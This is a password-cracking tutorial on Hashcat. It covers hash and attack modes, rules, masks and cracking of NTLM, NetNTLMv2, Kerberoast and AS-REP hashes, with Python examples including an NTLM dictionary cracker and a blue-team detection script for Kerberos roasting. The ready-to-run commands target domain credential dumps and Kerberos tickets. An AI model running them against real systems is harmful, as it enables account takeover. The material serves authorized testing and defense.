Legal & ethical disclaimer. This article is for education and authorized security testing only. Crack only hashes from systems you own or have explicit, written permission to test. Unauthorized password cracking violates the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws worldwide. You are responsible for your actions.
Introduction / Overview
Hashcat is the de facto standard offline password recovery tool. Once you have captured a hash — from a database dump, a secretsdump of NTDS.dit, a Kerberoast, or an AS-REP roast — Hashcat turns your GPU into a brute-force engine that tries billions of candidate passwords per second against that hash.
In this article you'll learn the four things that make Hashcat effective: choosing the correct hash mode (-m), the attack mode (-a), wordlists combined with rules, and mask attacks for structured brute force. We'll finish with two of the most common Active Directory targets — NTLM and Kerberos — and then weigh in with detection and defense so blue teams get equal treatment.
How it works / Background
Hashcat does not "reverse" a hash. It computes the hash of a candidate password and compares it to the target. A cryptographic hash is one-way, so cracking is a guessing game whose speed depends on the algorithm's cost.
Fast hashes (MD5, NTLM, SHA-1) have no salt and no iteration count, so a modern GPU computes tens to hundreds of billions per second. Slow hashes (bcrypt, Argon2, Kerberos with AES) are intentionally expensive, dropping throughput by orders of magnitude. That cost asymmetry is the entire reason slow hashes exist.
Two flags drive every run:
-m <mode>: the hash mode, a numeric ID identifying the algorithm. A few you must know:
- 0 = MD5
- 1000 = NTLM
- 1800 = sha512crypt ($6$, Linux /etc/shadow)
- 3200 = bcrypt ($2*$)
- 5600 = NetNTLMv2 (captured SMB/HTTP challenge-response)
- 13100 = Kerberos 5 TGS-REP etype 23 (RC4 Kerberoast)
- 19600 / 19700 = Kerberos 5 TGS-REP etype 17 / 18 (AES128 / AES256)
- 18200 = Kerberos 5 AS-REP etype 23 (AS-REP roast)
-a <attack>: the attack mode.
- -a 0 = straight (wordlist, optionally with rules)
- -a 1 = combinator (concatenate two wordlists)
- -a 3 = mask / brute force
- -a 6 / -a 7 = hybrid wordlist + mask (mask appended / mask prepended)
Run hashcat --help | grep -i ntlm to find a mode, or hashcat --example-hashes -m 1000 to see the exact expected format.
Prerequisites / Lab setup
You need a GPU with current drivers (NVIDIA CUDA or AMD ROCm/OpenCL), Hashcat 6.x, and a benchmark to confirm acceleration is working:
```bash
# Confirm Hashcat sees your GPU and measure raw speed for NTLM
hashcat -b -m 1000
# Grab a battle-tested wordlist and a rule set
git clone https://github.com/danielmiessler/SecLists.git
# rockyou ships with most pentest distros:
ls /usr/share/wordlists/rockyou.txt
```
Throughout, rockyou.txt is our base wordlist (on Kali it may still be gzipped; unpack it before use) and Hashcat's bundled rules (in /usr/share/hashcat/rules/ or the install's rules/ directory) supply mutations. Use --potfile-path to keep test cracks isolated, and --status --status-timer=10 for live progress.
Attack walkthrough / PoC
1. Straight wordlist attack
The simplest attack. Hash a candidate per wordlist line:
```bash
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -O -w 3
```
-O enables optimized kernels, which are faster but cap the candidate length; hashcat prints the kernel's maximum at startup (31 characters for most fast hashes, 27 for NTLM), so run a second pass without -O if your wordlist or rules produce longer candidates. -w 3 sets a high workload profile. Add --username if the file is in user:hash format from secretsdump, and later --show --username to print the cracked user:hash:password triples.
2. Rules — getting more from a wordlist
Rules programmatically mutate each wordlist word: capitalize, append digits, leetspeak, duplicate, etc. This is the single highest-value technique because real users transform base words predictably (Summer → Summer2025!).
```bash
# best64 is a great default; one word becomes ~64 candidates
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r rules/best64.rule
# Stack rule files with repeated -r (candidate counts multiply), or use the
# aggressive OneRuleToRuleThemAll set on its own
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
```
A rule is a tiny language: c capitalizes the first letter and lowercases the rest, $1 $2 $3 appends 123, sa@ substitutes a→@. So c sa@ $! turns password into P@ssword!. Hashcat's --stdout flag prints the candidates a rule set generates instead of cracking anything, which is the quickest way to check what a rule really does before committing GPU time.
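To make the "tiny language" concrete, here is a small interpreter for the rule functions used above. It is an added example for this article, not hashcat's own rule engine; the DEMO_RULES set is constructed for illustration and is not best64.rule.

```python
"""Tiny interpreter for a subset of the hashcat rule language.

Added example for this article, not hashcat's own code. It implements the
functions the text uses (c, $X, ^X, sXY) plus a few common single-character
ones, so you can see exactly what a rule does to a word before spending GPU
time. Anything outside that subset raises instead of silently mis-mutating.
"""

# Rule functions implemented, in hashcat syntax:
#   :    do nothing            l    lowercase all       u    uppercase all
#   c    capitalize first,     t    toggle case         r    reverse
#        lowercase the rest    d    duplicate           $X   append X
#   ^X   prepend X             sXY  replace every X with Y


def apply_rule(rule: str, word: str) -> str:
    """Apply one rule line (functions separated by spaces) to a single word."""
    i = 0

    def arg(offset: int) -> str:
        # argument characters follow the function letter immediately
        if i + offset >= len(rule):
            raise ValueError(f"rule {rule!r} is missing an argument")
        return rule[i + offset]

    while i < len(rule):
        fn = rule[i]
        if fn == " ":                      # separator between functions
            i += 1
            continue
        if fn == ":":
            pass
        elif fn == "l":
            word = word.lower()
        elif fn == "u":
            word = word.upper()
        elif fn == "c":
            word = word[:1].upper() + word[1:].lower()
        elif fn == "t":
            word = word.swapcase()
        elif fn == "r":
            word = word[::-1]
        elif fn == "d":
            word = word * 2
        elif fn == "$":
            word = word + arg(1)
            i += 1
        elif fn == "^":
            word = arg(1) + word
            i += 1
        elif fn == "s":
            word = word.replace(arg(1), arg(2))
            i += 2
        else:
            raise ValueError(f"unsupported rule function {fn!r} in rule {rule!r}")
        i += 1
    return word


def load_rules(text: str) -> list[str]:
    """Parse a .rule file body: one rule per line, '#' comments and blanks skipped."""
    return [line for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]


def candidates(words, rules) -> list[str]:
    """Every word x rule combination, de-duplicated, in hashcat's order
    (all rules applied to word 1, then all rules to word 2, ...)."""
    seen, out = set(), []
    for w in words:
        for r in rules:
            c = apply_rule(r, w)
            if c not in seen:
                seen.add(c)
                out.append(c)
    return out


# Constructed demo rule set in hashcat syntax (not best64.rule itself).
DEMO_RULES = load_rules("""
# the no-op keeps the unmodified word as a candidate too
:
c
c $1 $2 $3
c sa@ $!
$2 $0 $2 $5
u
""")

if __name__ == "__main__":
    for cand in candidates(["password", "summer"], DEMO_RULES):
        print(cand)
```

Feed it the body of a real rule file via load_rules to preview a whole set; functions it does not know (positional deletes, memory operations and so on) raise, which is the right failure mode when the point is to know exactly what a rule generates.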
```bash
# Print what best64 does to one word; no hashes are involved
echo "password" | hashcat -r rules/best64.rule --stdout | head
```
3. Mask attack — structured brute force
A mask attack (-a 3) brute-forces a known pattern instead of the whole keyspace. Built-in charsets:
- ?l = a-z
- ?u = A-Z
- ?d = 0-9
- ?s = symbols (the 33 printable ASCII punctuation characters, space included)
- ?a = ?l?u?d?s (all 95 printable ASCII characters)
- ?b = raw bytes 0x00-0xff
```bash
# Exactly 8 chars: one uppercase, five lowercase, two digits — e.g. "Summer25"
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?d?d
# Custom charset: -1 defines a set, then reference it as ?1
hashcat -m 1000 -a 3 hashes.txt -1 ?u?l ?1?l?l?l?l?l?d?d
# Incremental brute force up to 8 chars of any printable char
hashcat -m 1000 -a 3 --increment --increment-min 4 --increment-max 8 hashes.txt ?a?a?a?a?a?a?a?a
```
Hybrid attacks combine both: -a 6 rockyou.txt ?d?d?d?d appends four digits to every word; -a 7 ?d?d rockyou.txt prepends them.
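Before launching a mask it pays to know how big its keyspace is and how long it will take at the rate hashcat -b reported. The following is an added example for this article, not hashcat code: it rebuilds hashcat's built-in charsets, resolves custom -1..-4 sets, handles literal characters and the ?? escape, and sums the prefix keyspaces that --increment walks through. The hash rate in the usage block is an assumption, not a published figure.

```python
"""Keyspace and run-time estimate for a hashcat mask.

Added example for this article, not hashcat code. Builds the same character
sets hashcat uses (?l ?u ?d ?s ?a ?b, custom -1..-4 that may themselves contain
built-ins, '??' for a literal '?'), multiplies out the keyspace, and converts it
to wall-clock time at an assumed hash rate.
"""
import string

# hashcat's built-in charsets; ?s is the 33 printable ASCII symbols, space included.
SYMBOLS = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": SYMBOLS,
    "b": "".join(chr(i) for i in range(256)),
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]  # 95 chars


def expand_charset(spec: str, custom=None) -> str:
    """Turn '?u?l' or 'abc?d' into a de-duplicated string of characters.
    `custom` maps '1'..'4' to the -1..-4 definitions, which may nest built-ins."""
    custom = custom or {}
    out, i = [], 0
    while i < len(spec):
        ch = spec[i]
        if ch == "?":
            if i + 1 >= len(spec):
                raise ValueError(f"dangling '?' in {spec!r}")
            key = spec[i + 1]
            if key == "?":
                out.append("?")
            elif key in BUILTIN:
                out.extend(BUILTIN[key])
            elif key in custom:
                out.extend(expand_charset(custom[key], custom))
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(dict.fromkeys(out))      # dedupe, keep first-seen order


def mask_positions(mask: str, custom=None) -> list[str]:
    """One charset per password position; a literal character is a 1-char set."""
    sets, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            sets.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    return sets


def keyspace(mask: str, custom=None, inc_min=None, inc_max=None) -> int:
    """Number of candidates the mask generates. With --increment, hashcat runs
    the mask's prefixes of length inc_min..inc_max, so those keyspaces sum."""
    sets = mask_positions(mask, custom)
    if inc_min is None and inc_max is None:
        lengths = [len(sets)]
    else:
        lengths = range(inc_min or 1, (inc_max or len(sets)) + 1)
    total = 0
    for n in lengths:
        prod = 1
        for s in sets[:n]:
            prod *= len(s)
        total += prod
    return total


def estimate(mask: str, rate_per_sec: float, custom=None, **inc):
    """(keyspace, seconds) at a rate you measured with hashcat -b."""
    ks = keyspace(mask, custom, **inc)
    return ks, ks / rate_per_sec


if __name__ == "__main__":
    ASSUMED_NTLM_RATE = 100e9   # assumption: ~100 GH/s, a single high-end GPU class figure
    for label, mask, custom, inc in [
        ("Summer25 shape", "?u?l?l?l?l?l?d?d", None, {}),
        ("custom first char", "?1?l?l?l?l?l?d?d", {"1": "?u?l"}, {}),
        ("printable 4-8", "?a?a?a?a?a?a?a?a", None, {"inc_min": 4, "inc_max": 8}),
    ]:
        ks, secs = estimate(mask, ASSUMED_NTLM_RATE, custom, **inc)
        print(f"{label:18} {ks:>22,d} candidates  ~{secs / 3600:,.1f} h")
```

The three masks from the commands above span the range that matters: the Summer25 shape is about 3.1e10 candidates and finishes in seconds at NTLM speeds, while the full 4-8 printable sweep is about 6.7e18 and takes years at the same rate, which is why structure, not raw brute force, is what makes a mask attack worth running.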
4. Cracking NTLM
NTLM hashes are unsalted MD4 of the UTF-16LE password — extremely fast to crack. After dumping the domain database you'll have lines like Administrator:500:aad3b...:8846f7eaee8fb117ad06bdd830b7586c:::. Feed the file directly:
```bash
# secretsdump output: hashcat parses user:rid:lm:ntlm with --username
hashcat -m 1000 -a 0 --username ntds.txt rockyou.txt -r rules/best64.rule
```
That 8846f7eaee8fb117ad06bdd830b7586c is the NTLM of password (all lowercase), the best-known test value there is; the LM field before it is the constant empty-LM placeholder you will see on any modern domain. If a line is rejected as a format error, cut out just the NT hash (the fourth colon-separated field) and feed that instead. Note: you can also pass-the-hash with the raw NTLM, no cracking required, which is exactly why NTLM is dangerous.
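To see why NTLM falls so fast, here is the hash computed from scratch and run as a dictionary attack over a dump. This is an added example for this article, not hashcat or Impacket code; MD4 is written out in full because hashlib's md4 is often missing under OpenSSL 3. The dump lines are constructed: the usernames are made up, the LM field is the well-known empty-LM value, and the NT values are the well-known hashes of "password" and of the empty string.

```python
"""NTLM = MD4(UTF-16LE(password)), and why unsalted hashes crack in bulk.

Added example for this article, not hashcat or Impacket code. MD4 is written
out here because hashlib's md4 is frequently missing under OpenSSL 3. The
pwdump lines below are constructed: the LM field is the well-known empty-LM
value and the NT values are the well-known hashes of "password" and "".
"""
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three 16-step rounds over 64-byte blocks, little-endian."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M

    bit_len = len(data) * 8
    data += b"\x80"                                   # padding: 1 bit, zeros, length
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = h
        for i in range(16):                           # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                           # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                           # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & M for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def ntlm(password: str) -> str:
    """Hex NTLM hash: MD4 over the UTF-16LE encoding, no salt, no iterations."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(line: str):
    """secretsdump / pwdump layout: user:rid:lmhash:nthash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def crack_pwdump(dump: str, wordlist) -> dict:
    """Hash each candidate once and look it up against every target: with no
    salt, one MD4 per candidate tests the whole domain at once, which is why
    NTLM is so much cheaper to attack than a salted, iterated hash."""
    targets = {}
    for line in dump.splitlines():
        if not line.strip():
            continue
        user, _rid, _lm, nt = parse_pwdump(line)
        targets.setdefault(nt, []).append(user)
    found = {}
    for cand in wordlist:
        for user in targets.get(ntlm(cand), []):
            found.setdefault(user, cand)
    return found


# Constructed sample dump (see module docstring); usernames are made up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
SAMPLE_WORDLIST = ["123456", "Password", "password", "Summer2025!", ""]

if __name__ == "__main__":
    for user, pw in crack_pwdump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}:{pw!r}")
```

Two things the output makes visible: Administrator and svc_backup share a hash, so one MD4 of "password" cracks both (a salted scheme would force one computation per account), and jdoe's hash is the empty-string NTLM, a value worth grepping every dump for before running anything else.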
For NetNTLMv2 captured over the wire (e.g., with Responder), use -m 5600. These are challenge-response values: they cannot be passed-the-hash (though they can be relayed to hosts that do not enforce signing), but they crack offline just fine:
```bash
hashcat -m 5600 -a 0 netntlmv2.txt rockyou.txt -r rules/best64.rule
```
5. Cracking Kerberos (Kerberoasting & AS-REP roasting)
Kerberoasting abuses that any domain user can request a service ticket (TGS-REP) for any account with an SPN; part of the ticket is encrypted with the service account's password-derived key. Crack it offline to recover that password.
```bash
# RC4 ticket (etype 23) -> $krb5tgs$23$...
hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt -r rules/best64.rule
# AES256 ticket (etype 18) -> $krb5tgs$18$... (much slower)
hashcat -m 19700 -a 0 kerberoast_aes.txt rockyou.txt
```
AS-REP roasting targets accounts with Do not require Kerberos preauthentication set. The encrypted part of the AS-REP is encrypted with the user's password-derived key, so it cracks just like a Kerberoast:
```bash
# $krb5asrep$23$user@DOMAIN:...
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -r rules/best64.rule
```
See my deep dives on Kerberoasting and AS-REP Roasting for the request side with Impacket and Rubeus.
Authentication & cracking flow

The diagram shows a user requesting a Kerberos service ticket, extracting the encrypted blob, and cracking it offline with Hashcat to recover the service account password.
Detection & Defense (Blue Team)
Cracking is offline and invisible to the target, so defense focuses on preventing capture, raising hash cost, and detecting the request that precedes the crack.
- Long, random passwords beat every attack here. A 15+ character random password makes wordlist+rule attacks fail and mask/brute-force computationally infeasible even for fast NTLM. Enforce length, not just complexity (NIST SP 800-63B).
- Kill weak Kerberos encryption. Disable RC4 (etype 23) so Kerberoast tickets come back as AES (-m 19600/19700). The AES etypes derive the key with PBKDF2 (4096 iterations of HMAC-SHA1, per RFC 3962), whereas the RC4 key is simply the account's NTLM hash, so the same GPU cracks AES tickets two to three orders of magnitude slower. Set msDS-SupportedEncryptionTypes to AES-only on service accounts, audit accounts that still allow RC4, and reset passwords last changed before the domain supported AES, since those accounts hold no AES keys until the next change.
- Use Group Managed Service Accounts (gMSA) for SPN-bearing accounts. gMSA passwords are 120+ random characters rotated automatically — effectively uncrackable, neutralizing Kerberoasting (MITRE ATT&CK T1558.003).
- Detect the roast request. Monitor Event ID 4769 (Kerberos service ticket requested) for a high volume of requests, especially Ticket Encryption Type 0x17 (RC4) for many distinct service names from a single user or source IP in a short window. For AS-REP roasting (T1558.004), alert on Event ID 4768 with Pre-Authentication Type 0, and enumerate accounts with the DONT_REQ_PREAUTH bit (0x400000) set in userAccountControl so the flag can be removed.
- Neutralize NTLM capture. Disable NTLM where possible, enable SMB signing and LDAP channel binding to defeat Responder/relay, and segment networks. Watch for Event ID 4624/4625 anomalies and rogue responders.
- Protect the hash store. NTDS.dit extraction (T1003.003) requires DC access — restrict and monitor Domain Admin logons, volume shadow copies, and DCSync (Event ID 4662 with replication GUIDs).
- Slow hashing for apps. For anything you control, store passwords with bcrypt/scrypt/Argon2id, never MD5/SHA-1/NTLM-equivalents. See Password Storage Hardening.
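The 4769/4768 logic above is easy to state and easy to get wrong (one ticket per SPN is normal; one user touching every SPN in five minutes is not). This is an added example for this article, not any product's detection content: it runs a sliding-window count over constructed events carrying the relevant fields from the Windows event XML, and the thresholds are assumptions to tune against your own baseline.

```python
"""Windowed detection of Kerberoasting (4769) and AS-REP roasting (4768)
over constructed security events.

Added example for this article, not a product's detection logic. The events
are built inline as dicts carrying the fields from the Windows event XML
(TargetUserName, ServiceName, TicketEncryptionType, IpAddress, PreAuthType);
replace the sample list with events pulled from your SIEM. The thresholds are
assumptions to tune, not published values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4 = "0x17"          # 4769 TicketEncryptionType for etype 23
NO_PREAUTH = "0"      # 4768 PreAuthType 0: no pre-authentication required


def detect_kerberoast(events, min_spns=5, window=timedelta(minutes=5)):
    """Flag each (user, ip) that requested RC4 tickets for >= min_spns distinct
    service accounts inside any `window`. Computer accounts ($) and krbtgt are
    ignored: they are noise for this technique, not crackable targets."""
    by_actor = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_actor[(e["TargetUserName"], e["IpAddress"])].append((e["TimeCreated"], svc))

    alerts = []
    for (user, ip), reqs in by_actor.items():
        reqs.sort()
        best, lo = 0, 0
        for hi in range(len(reqs)):                 # sliding window over time
            while reqs[hi][0] - reqs[lo][0] > window:
                lo += 1
            best = max(best, len({s for _, s in reqs[lo:hi + 1]}))
        if best >= min_spns:
            alerts.append((user, ip, best))
    return alerts


def detect_asrep(events):
    """Every 4768 issued without pre-authentication is a candidate AS-REP
    roast; the account itself needs the DONT_REQ_PREAUTH flag removed."""
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == NO_PREAUTH})


def _ev(eid, t, user, ip, **fields):
    base = {"EventID": eid, "TimeCreated": datetime.fromisoformat(t),
            "TargetUserName": user, "IpAddress": ip}
    base.update(fields)
    return base


# Constructed sample: jdoe roasts eight SPNs in 35 seconds; alice's two AES
# requests hours apart are normal use; svc_legacy has pre-auth disabled.
SAMPLE_EVENTS = [
    _ev(4769, f"2025-01-15T09:00:{5 * n:02d}", "jdoe", "10.0.0.5",
        ServiceName=svc, TicketEncryptionType=RC4)
    for n, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_sccm",
                             "svc_exchange", "svc_ftp", "svc_ldap", "svc_print"])
] + [
    _ev(4769, "2025-01-15T09:00:10", "jdoe", "10.0.0.5", ServiceName="WS01$", TicketEncryptionType=RC4),
    _ev(4769, "2025-01-15T08:00:00", "alice", "10.0.0.9", ServiceName="svc_sql", TicketEncryptionType="0x12"),
    _ev(4769, "2025-01-15T14:00:00", "alice", "10.0.0.9", ServiceName="svc_web", TicketEncryptionType="0x12"),
    _ev(4768, "2025-01-15T09:05:00", "svc_legacy", "10.0.0.5", PreAuthType=NO_PREAUTH),
    _ev(4768, "2025-01-15T09:06:00", "alice", "10.0.0.9", PreAuthType="2"),
]

if __name__ == "__main__":
    for user, ip, n in detect_kerberoast(SAMPLE_EVENTS):
        print(f"KERBEROAST? {user} from {ip}: {n} distinct RC4 SPNs in one window")
    for user, ip in detect_asrep(SAMPLE_EVENTS):
        print(f"AS-REP ROAST? {user} from {ip}: TGT issued with no pre-auth")
```

Two design choices carry over to a real SIEM rule: key on the distinct service-name count rather than raw event volume (a busy application server legitimately requests the same SPN over and over), and once RC4 is disabled domain-wide, any 0x17 ticket at all becomes the alert, so the threshold can drop to one.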
Conclusion
Hashcat's power comes from matching the right -m mode to your hash and the right -a attack to your knowledge of the target. Wordlists plus rules crack the human-chosen passwords; mask attacks finish off structured ones; NTLM and Kerberos hashes fall fast when RC4 and weak passwords are in play. For defenders the takeaway is symmetric: long random passwords, AES-only Kerberos, gMSA, and watching Event ID 4769 turn an easy crack into a dead end.
References
- MITRE ATT&CK — T1558.003 Kerberoasting: https://attack.mitre.org/techniques/T1558/003/
- MITRE ATT&CK — T1558.004 AS-REP Roasting: https://attack.mitre.org/techniques/T1558/004/
- MITRE ATT&CK — T1003.003 OS Credential Dumping: NTDS: https://attack.mitre.org/techniques/T1003/003/
- Hashcat documentation & example hashes: https://hashcat.net/wiki/
- HackTricks — Kerberoast & cracking: https://book.hacktricks.xyz/
- NIST SP 800-63B Digital Identity Guidelines: https://pages.nist.gov/800-63-3/sp800-63b.html


